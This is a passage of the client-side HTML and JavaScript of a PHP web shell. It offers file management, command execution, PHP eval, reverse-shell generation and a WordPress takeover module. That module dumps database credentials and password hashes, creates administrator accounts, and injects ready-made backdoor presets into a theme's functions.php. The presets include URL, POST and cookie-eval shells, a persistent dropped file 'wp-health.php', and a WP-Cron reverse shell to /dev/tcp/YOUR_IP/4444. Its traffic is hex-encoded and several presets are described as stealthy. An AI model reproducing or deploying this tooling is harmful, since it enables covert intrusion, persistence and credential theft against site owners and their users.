onclick="wpBdPreset('cmd')" style="font-size:9px" title="URL param: ?wp_debug=cmd&cmd=BASE64(whoami)">💻 CMD URL</button> <button class="btn" onclick="wpBdPreset('post')" style="font-size:9px" title="POST param: curl -d 'c=BASE64(whoami)' URL">📩 POST Shell</button> <button class="btn" onclick="wpBdPreset('cookie')" style="font-size:9px" title="Cookie: curl -b 'wx_c=BASE64(phpcode)' URL">🍪 Cookie Eval</button> <button class="btn" onclick="wpBdPreset('filedrop')" style="font-size:9px" title="Drops /wp-content/uploads/wp-health.php">📥 File Drop</button> <button class="btn" onclick="wpBdPreset('cron')" style="font-size:9px" title="Rev shell via WP-cron (fill IP/PORT)">⏰ Cron Shell</button> <button class="btn" onclick="wpBdPreset('info')" style="font-size:9px" title="?wp_info=1 shows phpinfo()">ℹ phpinfo</button> </div> <div id="wpBdDesc" style="font-size:9px;color:#555;margin-bottom:6px;padding:4px 6px;background:rgba(255,255,255,.02);border-radius:2px">Select a preset to see usage instructions</div> <textarea class="fi" id="wpBdCode" rows="7" placeholder="PHP code to inject (without <?php) Example: add_action('wp_head',function(){if(isset($_GET['c']))system(base64_decode($_GET['c']));});" style="resize:vertical"></textarea> <div style="display:flex;gap:6px;margin-top:6px"> <button class="btn" onclick="wpInjectCode()" style="border-color:var(--rd);color:var(--rd)"><i class="fa fa-syringe"></i> Inject into functions.php</button> <button class="btn" onclick="document.getElementById('wpBdCode').value='';document.getElementById('wpBdDesc').textContent='Select a preset to see usage'">Clear</button> </div> </div> <div class="tco" id="wpbOut"></div> </div> <div class="tco" id="wpScanOut" style="display:none;margin-top:8px;max-height:320px"></div> </div> </div> <!-- LOGS --> <div class="spanel" id="st-logs"> <div class="tc2 full"> <h3><i class="fa fa-list-alt"></i> LOG VIEWER</h3> <div style="display:flex;gap:6px;margin-bottom:7px"> <select class="fi" id="logPath" style="flex:1;margin-bottom:0"> <option value="/var/log/apache2/access.log">Apache access.log</option> <option value="/var/log/apache2/error.log">Apache error.log</option> <option value="/var/log/nginx/access.log">Nginx access.log</option> <option value="/var/log/nginx/error.log">Nginx error.log</option> <option value="/var/log/auth.log">auth.log</option> <option value="/var/log/syslog">syslog</option> <option value="/var/log/messages">messages</option> <option value="custom">Custom path...</option> </select> <input class="fi" id="logCustom" placeholder="custom path" style="flex:1;display:none;margin-bottom:0"> <select class="fi" id="logLines" style="width:80px;margin-bottom:0"> <option value="50">50</option> <option value="100" selected>100</option> <option value="200">200</option> <option value="500">500</option> </select> <button class="btn" onclick="viewLog()"><i class="fa fa-eye"></i> View</button> </div> <div class="tco" style="max-height:350px" id="logOut"></div> </div> </div> </div> </div> </div> </div> <!-- EDITOR OVERLAY --> <div class="ov" id="edOv"> <div class="mo"> <div class="mor"> <span id="edN" style="color:var(--c2);font-size:11px"></span> <div style="display:flex;gap:6px;align-items:center"> <span id="edMsg" style="font-size:10px;color:var(--neon)"></span> <span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('edOv')">x</span> </div> </div> <textarea class="ce" id="edC" style="height:430px;width:100%"></textarea> <div style="margin-top:9px;display:flex;justify-content:flex-end;gap:6px"> <button class="btn" onclick="saveFile()"><i class="fa fa-save"></i> Save</button> </div> </div> </div> <!-- CHMOD OVERLAY --> <div class="ov" id="chmodOv"> <div class="mo" style="max-width:340px"> <div class="mor"><h3>CHMOD</h3><span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('chmodOv')">x</span></div> <div style="font-size:11px;color:#555;margin-bottom:8px" id="chmodFile"></div> <input class="fi" id="chmodVal" value="644" placeholder="e.g. 644, 755, 777"> <div class="fbr" style="margin-top:4px"> <button class="btn" onclick="chmodQuick('644')">644</button> <button class="btn" onclick="chmodQuick('755')">755</button> <button class="btn" onclick="chmodQuick('777')">777</button> <button class="btn" onclick="chmodQuick('400')">400</button> <button class="btn" onclick="chmodQuick('600')">600</button> </div> <div style="margin-top:9px;text-align:right"> <button class="btn" onclick="applyChmod()"><i class="fa fa-check"></i> Apply</button> </div> </div> </div> <!-- UPLOAD OVERLAY --> <div class="ov" id="upOv"> <div class="mo" style="max-width:370px;text-align:center"> <div class="mor"><h3>UPLOAD FILE</h3><span style="cursor:pointer;color:#333;font-size:18px;line-height:1" onclick="closeOv('upOv')">x</span></div> <input type="file" id="upF" style="display:none" onchange="doUpload()"> <button class="btn" style="padding:18px 36px;border-style:dashed;font-size:12px" onclick="document.getElementById('upF').click()"> <i class="fa fa-cloud-upload-alt"></i> Select File </button> <div id="upS" style="margin-top:11px;font-size:10px;color:var(--neon)">ready</div> </div> </div> <script> var _TK='';try{_TK=new URLSearchParams(location.search).get('enusm')||'';}catch(_e){} let CWD='',_HIST=[],_HI=0,_EDF='',_CHMODF=''; function h2s(h){try{const b=new Uint8Array(h.length/2);for(let i=0;i<h.length;i+=2)b[i/2]=parseInt(h.substr(i,2),16);return new TextDecoder('utf-8').decode(b);}catch(_e){let s='';for(let i=0;i<h.length;i+=2)s+=String.fromCharCode(parseInt(h.substr(i,2),16));return s;}} function s2h(s){try{const b=new TextEncoder().encode(s);return Array.from(b).map(x=>x.toString(16).padStart(2,'0')).join('');}catch(_e){let h='';for(let i=0;i<s.length;i++)h+=s.charCodeAt(i).toString(16).padStart(2,'0');return h;}} function h2b(h){const b=new Uint8Array(h.length/2);for(let i=0;i<h.length;i+=2)b[i/2]=parseInt(h.substr(i,2),16);return b;} async function api(t){ const bar=document.getElementById('bar');bar.style.width='65%'; t.d=CWD;t['enusm']=_TK; const j=JSON.stringify(t);let h='';for(let i=0;i<j.length;i++)h+=j.charCodeAt(i).toString(16).padStart(2,'0'); const fd=new FormData();fd.append('drv3u24',h); try{ const r=await(await fetch('',{method:'POST',body:fd})).json(); bar.style.width='100%';setTimeout(()=>bar.style.width='0',180);return r; }catch(e){bar.style.width='0';return{ok:false,e:'network'};} } function switchTab(el,id){ document.querySelectorAll('.tab').forEach(t=>t.classList.remove('on')); document.querySelectorAll('.panel').forEach(p=>p.classList.remove('on')); el.classList.add('on');document.getElementById('p-'+id).classList.add('on'); if(id==='info')loadInfo(); if(id==='tools'){document.querySelector('.stab.on')||stab(document.querySelector('.stab'),'net');} } function stab(el,id){ document.querySelectorAll('.stab').forEach(t=>t.classList.remove('on')); document.querySelectorAll('.spanel').forEach(p=>p.classList.remove('on')); if(typeof el==='string'){id=el;el=document.querySelector('[onclick*="stab(this,\''+id+'\'"]');} if(el)el.classList.add('on'); const p=document.getElementById('st-'+id);if(p)p.classList.add('on'); } // ── FILE MANAGER ───────────────────────────────────────────────────────────── async function ls(){ const r=await api({a:'ls'});if(!r.ok)return; CWD=r.cwd; document.getElementById('hdinfo').textContent=h2s(CWD); document.getElementById('tp').textContent=h2s(CWD)+' $ '; let bc='<span onclick="nav(\''+s2h('/')+'\')" style="color:var(--neon)">⌂</span>'; (r.bc||[]).forEach(b=>bc+=`<span class="sep">/</span><span onclick="nav('${b.x}')">${h2s(b.n)}</span>`); document.getElementById('bc').innerHTML=bc; let html=''; (r.d||[]).forEach(d=>{ html+=`<tr><td><a href="#" onclick="nav('${d.x}')" style="color:#ddd;text-decoration:none"><i class="fa fa-folder ico" style="color:var(--neon)"></i>${h2s(d.n)}</a></td><td style="color:#1a1a1a">DIR</td><td style="color:#1a1a1a">${d.t}</td><td><span class="badge" onclick="openChmod('${d.n}','${d.p}')" style="cursor:pointer" title="chmod">${d.p}</span></td><td style="text-align:right"><i class="fa fa-pen act" onclick="renF('${d.n}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px"></i><i class="fa fa-trash" onclick="delF('${d.n}')" style="color:var(--rd);cursor:pointer;opacity:.5"></i></td></tr>`; }); (r.f||[]).forEach(f=>{ let ic='fa-file',cc='#3a3a3a'; if(f.e==='php'){ic='fa-php';cc='#a78bfa';} else if(['png','jpg','jpeg','gif','webp','svg'].includes(f.e)){ic='fa-image';cc='#f59e0b';} else if(['txt','log','md','conf','cfg','ini','env','.htaccess'].includes(f.e)){ic='fa-file-alt';cc='#60a5fa';} else if(['zip','gz','tar','rar','7z'].includes(f.e)){ic='fa-file-archive';cc='#34d399';} else if(['sh','py','rb','pl','js','ts'].includes(f.e)){ic='fa-file-code';cc='#f87171';} else if(['sql','db','sqlite'].includes(f.e)){ic='fa-database';cc='#fb923c';} html+=`<tr><td><i class="fa ${ic} ico" style="color:${cc}"></i>${h2s(f.n)}</td><td style="color:#2a2a2a">${f.s}</td><td style="color:#1a1a1a">${f.t}</td><td><span class="badge" onclick="openChmod('${f.n}','${f.p}')" style="cursor:pointer" title="chmod">${f.p}</span></td><td style="text-align:right"><i class="fa fa-code" onclick="editF('${f.n}')" style="color:#666;cursor:pointer;margin-right:8px" title="Edit"></i><i class="fa fa-download" onclick="dlF('${f.n}')" style="color:var(--c2);cursor:pointer;margin-right:8px;opacity:.7" title="Download"></i><i class="fa fa-pen" onclick="renF('${f.n}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px" title="Rename"></i><i class="fa fa-trash" onclick="delF('${f.n}')" style="color:var(--rd);cursor:pointer;opacity:.5" title="Delete"></i></td></tr>`; }); document.getElementById('tb').innerHTML=html||'<tr><td colspan="5" style="color:#1a1a1a;text-align:center;padding:28px;font-size:11px">[empty]</td></tr>'; } function nav(hx){CWD=hx;ls();} async function delF(hn){if(!confirm('Delete '+h2s(hn)+'?'))return;const r=await api({a:'rm',n:h2s(hn)});r.ok?ls():alert('Error deleting');} async function renF(hn){const o=h2s(hn);const n=prompt('Rename:',o);if(!n||n===o)return;const r=await api({a:'rn',o,n});r.ok?ls():alert('Error renaming');} async function mkDir(){const n=prompt('Directory name:');if(!n)return;const r=await api({a:'mk',n});r.ok?ls():alert('Error');} async function newFile(){const n=prompt('File name:','new_file.txt');if(!n)return;const r=await api({a:'newf',n});r.ok?ls():alert('Error');} async function editF(hn){ const n=h2s(hn);const r=await api({a:'rd',n}); if(!r.ok){alert('Cannot read: '+n);return;} document.getElementById('edC').value=h2s(r.c); document.getElementById('edN').textContent='// '+n; document.getElementById('edMsg').textContent=''; _EDF=n;showOv('edOv'); } async function saveFile(){ const c=document.getElementById('edC').value; const r=await api({a:'wr',n:_EDF,c:s2h(c)}); if(r.ok){document.getElementById('edMsg').textContent='saved ✓';ls();}else alert('Save failed'); } async function dlF(hn){ const n=h2s(hn);const r=await api({a:'dl',n}); if(!r.ok){alert('Error');return;} const b=new Blob([h2b(r.c)],{type:'application/octet-stream'}); const a=document.createElement('a');a.href=URL.createObjectURL(b);a.download=h2s(r.n);a.click(); } function openChmod(hn,perm){_CHMODF=h2s(hn);document.getElementById('chmodFile').textContent=_CHMODF;document.getElementById('chmodVal').value=perm;showOv('chmodOv');} function chmodQuick(v){document.getElementById('chmodVal').value=v;} async function applyChmod(){ const m=document.getElementById('chmodVal').value; const r=await api({a:'chm',n:_CHMODF,m}); if(r.ok){closeOv('chmodOv');ls();}else alert('chmod failed'); } async function doUpload(){ const file=document.getElementById('upF').files[0];if(!file)return; let done=0,first=true;document.getElementById('upS').textContent='0%'; while(done<file.size){ const chunk=file.slice(done,done+65536); const ab=await new Promise(res=>{const fr=new FileReader();fr.onload=e=>res(e.target.result);fr.readAsArrayBuffer(chunk);}); const hex=Array.from(new Uint8Array(ab)).map(b=>b.toString(16).padStart(2,'0')).join(''); await api({a:'up',n:file.name,d:hex,f:first}); done+=65536;first=false; document.getElementById('upS').textContent=Math.min(100,Math.round(done/file.size*100))+'%'; } document.getElementById('upS').textContent='done!'; setTimeout(()=>{closeOv('upOv');ls();},700); } // ── SHELL ───────────────────────────────────────────────────────────────────── async function runCmd(cmd){ const to=document.getElementById('to'); to.textContent+='$ '+cmd+'\n'; if(/^cd(\s|$)/.test(cmd)){ const path=cmd.replace(/^cd\s*/,'').trim()||'~'; const r=await api({a:'cd',p:path}); if(r.ok){CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';to.textContent+=h2s(CWD)+'\n';} else to.textContent+='cd: no such directory\n'; }else{ const r=await api({a:'ex',cmd}); if(r.ok){to.textContent+=h2s(r.out)||'';CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';} } to.scrollTop=to.scrollHeight; } function termKd(e){ const el=document.getElementById('tc'); if(e.key==='Enter'){const cmd=el.value.trim();if(!cmd)return;_HIST.unshift(cmd);_HI=0;el.value='';runCmd(cmd);} else if(e.key==='ArrowUp'){e.preventDefault();if(_HI<_HIST.length)el.value=_HIST[_HI++];} else if(e.key==='ArrowDown'){e.preventDefault();_HI=Math.max(0,_HI-1);el.value=_HIST[_HI]||'';} else if(e.ctrlKey&&e.key==='l'){e.preventDefault();document.getElementById('to').textContent='';} } // ── PHP ──────────────────────────────────────────────────────────────────────── async function runPHP(){ const code=document.getElementById('phpcode').value; const r=await api({a:'ev',code}); document.getElementById('phpout').textContent=r.ok?h2s(r.out):'[error]'; } function clrPHP(){document.getElementById('phpcode').value='';document.getElementById('phpout').textContent='';} // ── INFO ──────────────────────────────────────────────────────────────────── async function loadInfo(){ const r=await api({a:'info'}); if(!r.ok){document.getElementById('infoC').innerHTML='<div style="color:#222;text-align:center;padding:50px">failed</div>';return;} const i=r.i; document.getElementById('infoC').innerHTML=`<div class="ig"> <div class="cd"><h3>SYSTEM</h3> <div class="kv"><span class="k">OS</span><span class="v">${i.os}</span></div> <div class="kv"><span class="k">PHP</span><span class="v">${i.php} (${i.sapi})</span></div> <div class="kv"><span class="k">User</span><span class="v">${i.user}</span></div> <div class="kv"><span class="k">Server</span><span class="v">${i.srv}</span></div> <div class="kv"><span class="k">IP:Port</span><span class="v">${i.ip}:${i.port}</span></div> </div> <div class="cd"><h3>PATHS</h3> <div class="kv"><span class="k">CWD</span><span class="v">${i.cwd}</span></div> <div class="kv"><span class="k">DocRoot</span><span class="v">${i.doc}</span></div> <div class="kv"><span class="k">Shell</span><span class="v">${h2s(i.file)}</span></div> </div> <div class="cd"><h3>RESOURCES</h3> <div class="kv"><span class="k">Memory</span><span class="v">${i.mem}</span></div> <div class="kv"><span class="k">Disk Free</span><span class="v">${i.df}</span></div> <div class="kv"><span class="k">Disk Total</span><span class="v">${i.dt}</span></div> </div> <div class="cd" style="grid-column:1/-1"><h3>DISABLED FUNCTIONS</h3> <div style="font-size:10px;color:${i.disable?'#f87171':'var(--neon)'};line-height:1.8">${i.disable||'(none — fully featured)'}</div> </div> <div class="cd" style="grid-column:1/-1"><h3>LOADED EXTENSIONS</h3> <div style="font-size:10px;color:#2a2a2a;word-break:break-all;line-height:1.9">${i.ext}</div> </div> </div>`; } // ── TOOLS ───────────────────────────────────────────────────────────────────── async function net(sub){ const h=document.getElementById('nH').value,p=document.getElementById('nP').value; const r=await api({a:'net',s:sub,h,u:h,p}); document.getElementById('netOut').textContent=h2s(r.out||''); } async function pe(sub){ const r=await api({a:'pe',s:sub}); document.getElementById('peOut').textContent=h2s(r.out||''); } async function genRS(run){ if(run&&!confirm('Execute reverse shell on target?'))return; const ip=document.getElementById('rsIp').value,port=document.getElementById('rsPort').value,t=document.getElementById('rsType').value; const r=await api({a:'rs',ip,port,t,run:!!run}); document.getElementById('rsOut').textContent=h2s(r.cmd||''); } let _psRaw=''; async function runPs(){ const r=await api({a:'ps'});_psRaw=h2s(r.out||''); document.getElementById('psOut').textContent=_psRaw;filterPs(); } function filterPs(){ const f=document.getElementById('psFilter').value.toLowerCase(); if(!f){document.getElementById('psOut').textContent=_psRaw;return;} document.getElementById('psOut').textContent=_psRaw.split('\n').filter(l=>l.toLowerCase().includes(f)).join('\n'); } async function runEnc(){ const m=document.getElementById('encMode').value; const d=document.getElementById('encIn').value; const r=await api({a:'enc',m,d:s2h(d)}); document.getElementById('encOut').value=r.ok?h2s(r.out):'[error]'; } function swapEnc(){ const i=document.getElementById('encIn'),o=document.getElementById('encOut'); const tmp=i.value;i.value=o.value;o.value=tmp; } async function runGrep(rec){ const pat=document.getElementById('srchPat').value; const dir=document.getElementById('srchDir').value||h2s(CWD); const cs=document.getElementById('srchCS').checked; const r=await api({a:'grep',pat,dir,rec,cs}); document.getElementById('srchOut').textContent=h2s(r.out||'(no results)'); } async function runFind(type){ const pat=document.getElementById('srchPat').value||'*'; const dir=document.getElementById('srchDir').value||h2s(CWD); const r=await api({a:'fnd',pat,dir,t:type}); document.getElementById('srchOut').textContent=h2s(r.out||'(no results)'); } async function runArc(sub){ const name=document.getElementById('arcName').value; const target=document.getElementById('arcTarget').value||'.'; const file=document.getElementById('arcFile').value; const r=await api({a:'arc',s:sub,name,target,f:file}); document.getElementById('arcOut').textContent=h2s(r.out||''); } // ── WORDPRESS MODULE ────────────────────────────────────────────────────────── var _wpRoot='',_wpPrefix='wp_'; function wpPfx(){return _wpPrefix;} function wpTab(el,id){ document.querySelectorAll('.wptab').forEach(t=>t.classList.remove('on')); document.querySelectorAll('.wpsub').forEach(p=>p.classList.remove('on')); el.classList.add('on');const p=document.getElementById('wps-'+id);if(p)p.classList.add('on'); } async function wpDetect(){ const r=await api({a:'wp',s:'find'}); if(r.root){_wpRoot=r.root;document.getElementById('wpRootPath').textContent=h2s(r.root);} else document.getElementById('wpRootPath').textContent='Not found — navigate to WP directory'; } async function wpGetInfo(){ if(!_wpRoot)await wpDetect(); if(!_wpRoot){document.getElementById('wpiOut').textContent='WP root not found';return;} const r=await api({a:'wp',s:'sysinfo'}); if(!r.ok){document.getElementById('wpiOut').textContent=r.e||'Error';return;} document.getElementById('wpVersion').textContent='v'+r.version; document.getElementById('wpiOut').textContent='Version: '+r.version+'\nRoot: '+h2s(r.root||'')+'\nSite URL: '+h2s(r.siteurl||'')+'\nWP_DEBUG: '+r.debug+'\nFile Editing: '+r.file_edit; } async function wpS(sub,extra){ if(!_wpRoot)await wpDetect(); if(!_wpRoot){alert('WordPress not found. Navigate to WP directory first.');return;} const r=await api(Object.assign({a:'wp',s:sub},extra||{})); if(sub==='creds'){ if(!r.ok){document.getElementById('wpiOut').textContent=r.e||'Error';return;} let out='=== DATABASE ===\n';Object.entries(r.db||{}).forEach(([k,v])=>out+=k+': '+v+'\n'); out+='\nWP Root: '+h2s(r.root||'')+'\nWP Version: '+(r.version||'?'); document.getElementById('wpiOut').textContent=out; }else if(sub==='uploads'||sub==='recent'){ document.getElementById('wpfOut').textContent=h2s(r.out||''); }else if(sub==='scan'){ const el=document.getElementById('wpScanOut');el.style.display='block';el.textContent=h2s(r.out||''); } return r; } async function wpGetOpts(){ if(!_wpRoot)await wpDetect(); const keys=document.getElementById('wpOptKeys').value; const r=await api({a:'wp',s:'opts',keys:keys}); if(!r.ok){document.getElementById('wpiOut').textContent=r.e||'Error';return;} let out='=== WP OPTIONS ===\n';Object.entries(r.opts||{}).forEach(([k,v])=>out+=k+': '+v+'\n'); document.getElementById('wpiOut').textContent=out; } async function wpSetOpt(){ if(!_wpRoot)await wpDetect(); const key=document.getElementById('wpOptKey').value,val=document.getElementById('wpOptVal').value; if(!key)return alert('Enter option name'); const r=await api({a:'wp',s:'setopt',key,val}); document.getElementById('wpiOut').textContent=r.ok?'Option updated: '+key+' = '+val:(r.e||'Error'); } async function wpRunSql(){ if(!_wpRoot)await wpDetect(); const sql=document.getElementById('wpSql').value;if(!sql)return; const r=await api({a:'wp',s:'dbq',sql}); if(r.ok){document.getElementById('wpdOut').textContent=h2s(r.out||'');if(r.count!==undefined)document.getElementById('wpDbCount').textContent=r.count+' rows';} else document.getElementById('wpdOut').textContent='ERROR: '+(r.e||'unknown'); } function wpDbQ(sql){document.getElementById('wpSql').value=sql.replace(/'/g,"'");wpRunSql();} async function wpListUsers(){ if(!_wpRoot)await wpDetect(); const r=await api({a:'wp',s:'users'}); if(!r.ok){document.getElementById('wpuOut').textContent=r.e||'Error';return;} let html='<table style="width:100%;border-collapse:collapse;font-size:10px"><tr style="color:#444"><th style="text-align:left;padding:3px 6px">ID</th><th style="text-align:left;padding:3px 6px">Login</th><th style="text-align:left;padding:3px 6px">Email</th><th style="text-align:left;padding:3px 6px">Role</th><th style="text-align:left;padding:3px 6px">Hash(20)</th></tr>'; (r.users||[]).forEach(u=>{const role=u.role;const rc=role==='administrator'?'color:var(--rd)':role==='editor'?'color:#f59e0b':'color:#555';html+=`<tr style="border-bottom:1px solid var(--bd)"><td style="padding:3px 6px;color:#555">${u.id}</td><td style="padding:3px 6px;color:#fff">${h2s(u.login)}</td><td style="padding:3px 6px;color:#888">${h2s(u.email)}</td><td style="padding:3px 6px;${rc}">${u.role}</td><td style="padding:3px 6px;color:#333;font-size:9px">${h2s(u.hash)}...</td></tr>`;}); html+='</table>';document.getElementById('wpUserList').innerHTML=html; } async function wpAddUser(){ if(!_wpRoot)await wpDetect(); const login=document.getElementById('wpNewLogin').value||'px5admin'; const pass=document.getElementById('wpNewPass').value; const email=document.getElementById('wpNewEmail').value; const r=await api({a:'wp',s:'adduser',login,pass,email}); if(r.ok)document.getElementById('wpuOut').textContent='SUCCESS! User created:\nID: '+r.id+'\nLogin: '+h2s(r.login)+'\nPassword: '+h2s(r.pass)+'\n\nLogin at: '+h2s(_wpRoot)+'/wp-admin/'; else document.getElementById('wpuOut').textContent='FAILED: '+(r.e||'unknown error'); } async function wpChPwd(){ if(!_wpRoot)await wpDetect(); const login=document.getElementById('wpChPwdLogin').value,pass=document.getElementById('wpChPwdPass').value; if(!login||!pass)return alert('Fill login and password'); const r=await api({a:'wp',s:'chpwd',login,pass}); document.getElementById('wpuOut').textContent=r.ok&&r.affected>0?'Password changed for: '+login:'Failed (user not found or error)'; } async function wpListPlugins(){ if(!_wpRoot)await wpDetect(); const r=await api({a:'wp',s:'plugins'}); if(!r.ok){document.getElementById('wppOut').textContent=r.e||'Error';return;} let html=''; (r.plugins||[]).forEach(p=>{ const ac=p.active;const slug=p.name+'/'+p.name+'.php'; html+=`<div style="display:flex;gap:8px;align-items:center;padding:4px 0;border-bottom:1px solid var(--bd);font-size:10px"> <span style="color:${ac?'var(--neon)':'#333'}">${ac?'●':'○'}</span> <span style="flex:1;color:${ac?'#ccc':'#555'}">${p.name}</span> <button class="btn" style="font-size:9px;padding:2px 6px" onclick="wpTogglePlugin('${p.name}',${ac})">${ac?'Deactivate':'Activate'}</button> </div>`; }); document.getElementById('wpPluginList').innerHTML=html||'<span style="color:#333;font-size:10px">No plugins found</span>'; } async function wpTogglePlugin(name,isActive){ if(!_wpRoot)await wpDetect(); const sub=isActive?'deactplg':'actplg';const slug=name+'/'+name+'.php'; const r=await api({a:'wp',s:sub,plg:slug}); document.getElementById('wppOut').textContent=r.ok?(isActive?'Deactivated':'Activated')+': '+name:'Error: '+(r.e||'unknown'); wpListPlugins(); } async function wpListThemes(){ if(!_wpRoot)await wpDetect(); const r=await api({a:'wp',s:'themes'}); if(!r.ok){document.getElementById('wptOut').textContent=r.e||'Error';return;} const cur=h2s(r.current||''); let html=''; (r.themes||[]).forEach(t=>{html+=`<div style="padding:4px 0;border-bottom:1px solid var(--bd);font-size:10px;display:flex;gap:8px;align-items:center"><span style="color:${t.active?'var(--neon)':'#333'}">${t.active?'●':'○'}</span><span style="color:${t.active?'#ccc':'#555'};flex:1">${t.name}</span>${t.active?'<span style="font-size:9px;color:var(--neon)">(active)</span>':''}</div>`;}); document.getElementById('wpThemeList').innerHTML=html; document.getElementById('wptOut').textContent='Active theme: '+cur; } async function wpRecentFiles(days){ if(!_wpRoot)await wpDetect(); const r=await api({a:'wp',s:'recent',days}); document.getElementById('wpfOut').textContent=h2s(r.out||'(none)'); } const _wpBdPresets={ 'cmd':{desc:`URL CMD shell (Base64-encoded commands)\nAccess: site.com/?wp_debug=cmd&cmd=BASE64(whoami)\nGenerate base64: echo -n "whoami" | base64\nOutput returned as plain text.`,code:"// CMD shell - ?wp_debug=cmd&cmd=BASE64(command)\nadd_action('init',function(){if(isset($_GET['wp_debug'])&&$_GET['wp_debug']==='cmd'&&isset($_GET['cmd'])){ob_clean();header('Content-Type:text/plain;charset=utf-8');echo shell_exec(base64_decode($_GET['cmd']));die();}},1);"}, 'post':{desc:`POST shell (command not in URL/access logs)\nAccess: curl -X POST site.com/ --data c=BASE64(id)\nWorks on ANY WordPress page.`,code:"// POST shell - no cmd in access logs\n// curl -X POST https://site.com/ --data 'c=BASE64(whoami)'\nadd_action('init',function(){if(isset($_POST['c'])&&strlen($_POST['c'])>4){ob_clean();header('Content-Type:text/plain;charset=utf-8');echo shell_exec(base64_decode($_POST['c']));die();}},1);"}, 'cookie':{desc:`Cookie eval (most stealthy - nothing in URL or POST)\nEncode PHP as base64, send as cookie wx_c\nLinux: B=$(echo -n "system(id);" | base64); curl -b "wx_c=$B" https://site.com/\nFires on EVERY page load silently.`,code:"// Cookie eval - most stealthy\n// curl -b 'wx_c=BASE64_PHP_CODE' https://site.com/\nadd_action('wp_footer',function(){if(isset($_COOKIE['wx_c'])&&strlen($_COOKIE['wx_c'])>8){@eval(base64_decode($_COOKIE['wx_c']));}},9999);"}, 'filedrop':{desc:`Drops a PHP shell into /wp-content/uploads/\nFile created on first page visit after injection\nAccess: site.com/wp-content/uploads/wp-health.php?c=BASE64(id)\nSurvives theme changes and plugin deactivation.`,code:"// Drops /wp-content/uploads/wp-health.php\n// Access: /wp-content/uploads/wp-health.php?c=BASE64(whoami)\nadd_action('init',function(){$f=ABSPATH.'wp-content/uploads/wp-health.php';if(!file_exists($f)){file_put_contents($f,'<'.'?php if(isset($_REQUEST[\"c\"])){@ob_clean();@header(\"Content-Type:text/plain\");echo shell_exec(base64_decode($_REQUEST[\"c\"]));} ?'.'>');}},1);"}, 'cron':{desc:`Reverse shell via WP-Cron - EDIT IP AND PORT FIRST!\nListener: nc -lvnp 4444\nTrigger: visit any page or site.com/wp-cron.php?doing_wp_cron\nFires once as scheduled event ~5 sec after first page load.`,code:"// EDIT YOUR_IP AND PORT before injecting!\nadd_action('init',function(){if(!wp_next_scheduled('px5_s')){wp_schedule_single_event(time()+5,'px5_s');}});\nadd_action('px5_s',function(){shell_exec('bash -c \\'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1\\' &');});"}, 'info':{desc:`phpinfo() via URL param (quick server recon)\nAccess: site.com/?wp_info=1\nShows PHP version, extensions, env vars, server config.`,code:"// phpinfo() - access: /?wp_info=1\nadd_action('init',function(){if(isset($_GET['wp_info'])&&$_GET['wp_info']==='1'){ob_clean();phpinfo();die();}},1);"} }; function wpBdPreset(t){ const p=_wpBdPresets[t];if(!p)return; document.getElementById('wpBdDesc').textContent=p.desc; document.getElementById('wpBdCode').value=p.code; } async function wpInjectCode(){ if(!_wpRoot)await wpDetect(); const code=document.getElementById('wpBdCode').value; if(!code)return alert('Enter code to inject'); if(!confirm('Inject PHP code into active theme functions.php?'))return; const r=await api({a:'wp',s:'backdoor',code:s2h(code)}); if(r.ok)document.getElementById('wpbOut').textContent='Injected into: '+h2s(r.file||'')+'\nTheme: '+h2s(r.theme||''); else document.getElementById('wpbOut').textContent='FAILED: '+(r.e||'unknown'); } function viewLog(){ const sel=document.getElementById('logPath'); const path=sel.value==='custom'?document.getElementById('logCustom').value:sel.value; const n=document.getElementById('logLines').value; api({a:'log',l:path,n}).then(r=>document.getElementById('logOut').textContent=h2s(r.out||'(empty or not found)')); } document.getElementById('logPath').addEventListener('change',function(){ document.getElementById('logCustom').style.display=this.value==='custom'?'block':'none'; }); // ── OVERLAYS ────────────────────────────────────────────────────────────────── function showOv(id){document.getElementById(id).classList.add('on');} function closeOv(id){document.getElementById(id).classList.remove('on');} document.addEventListener('keydown',e=>{ if(e.key==='Escape')document.querySelectorAll('.ov.on').forEach(o=>o.classList.remove('on')); if(e.ctrlKey&&e.shiftKey&&e.key==='P'){e.preventDefault();document.querySelector('[onclick*="term"]')&&switchTab(document.querySelector('[onclick*="term"]'),'term');document.getElementById('tc').focus();} }); // ── INIT ────────────────────────────────────────────────────────────────────── (async function(){const r=await api({a:'ping'});if(r.cwd)CWD=r.cwd;ls();})(); </script> </body> </html>
Close
